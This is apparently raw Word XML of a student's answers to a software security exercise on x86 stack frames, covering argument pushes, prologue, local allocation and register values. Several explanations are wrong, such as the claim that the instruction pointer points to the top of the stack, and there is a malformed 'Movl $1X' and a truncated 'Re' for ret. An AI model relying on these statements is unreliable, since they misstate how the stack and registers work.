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FE3" w:rsidRPr="002205A7" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Bell MT" w:hAnsi="Bell MT" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002205A7">
        <w:rPr>
          <w:rFonts w:ascii="Bell MT" w:hAnsi="Bell MT" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Software Security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="002205A7" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002205A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Exercise 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC7281" w:rsidRDefault="00FC7281" w:rsidP="00426FE3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A566DA5" wp14:editId="310B8D87">
            <wp:extent cx="6479540" cy="3642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79540" cy="3642995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00ED2AE5" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="002205A7" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:after="34"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002205A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Parameters:</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bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Mov long</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bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Movl   $0X2,0X4(%esp) </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bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">$0X2 refers to constant integer argument </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="002205A7" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002205A7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.Pushing second argument value 2, of type integer, therefore 4 bytes. Address is shifted to 4 bytes</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bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Movl  $1X,(%esp) </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bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>$0X1 refers to constant integer argument</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="002205A7" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002205A7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.Pushing first argument value 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="002205A7" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:after="34"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="002205A7" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:after="34"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002205A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Function Prologue:</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color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.Push the base pointer.</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color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2. Make the base pointer to point the top of the stack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="002205A7" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002205A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3. Allocate size to variables.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="002205A7" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:after="34"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002205A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Local variables</w:t>
      </w:r>
      <w:r w:rsidRPr="002205A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (how much size is allocated? And why?):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="002205A7" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002205A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Main</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="002205A7" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002205A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Sub $0X10, %esp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="002205A7" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002205A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Function1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="002205A7" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002205A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Array int[5] 20 bytes.</w:t>
      </w:r>
      <w:r w:rsidRPr="002205A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sub $0X20, %esp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="002205A7" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="002205A7" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002205A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Function Ending:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="002205A7" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002205A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Leave</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="002205A7" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002205A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Re</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="002205A7" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002205A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Exercise 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00ED2AE5" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:after="34"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2AE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Do any registers take notable values?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00ED2AE5" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:after="34"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2AE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>What are the purposes of each of those affected registers?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2AE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>What could be the consequence from a security point of view?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40503488" wp14:editId="5FFC111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227A6" w:rsidRDefault="00D227A6" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65C66C20" wp14:editId="24E1F9F0">
            <wp:extent cx="6162675" cy="346484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3353" cy="3465225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00497E2D" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00ED2AE5" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B901A5E" wp14:editId="525052C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26FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00497E2D" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00497E2D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Notable values of registers:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00497E2D" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00497E2D">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Base pointer and Instruction pointer points the same address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00497E2D" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00497E2D">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Stack pointer occupies a higher memory address than base pointer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00497E2D" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00EA0C3D" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA0C3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Affected registers and purposes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00ED2AE5" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2AE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Instruction pointer should point to the address of the function from where it is called.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00497E2D" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00497E2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Instruction pointer shou</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>ld point the top of the stack. i</w:t>
      </w:r>
      <w:r w:rsidRPr="00497E2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>.e Stack pointer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
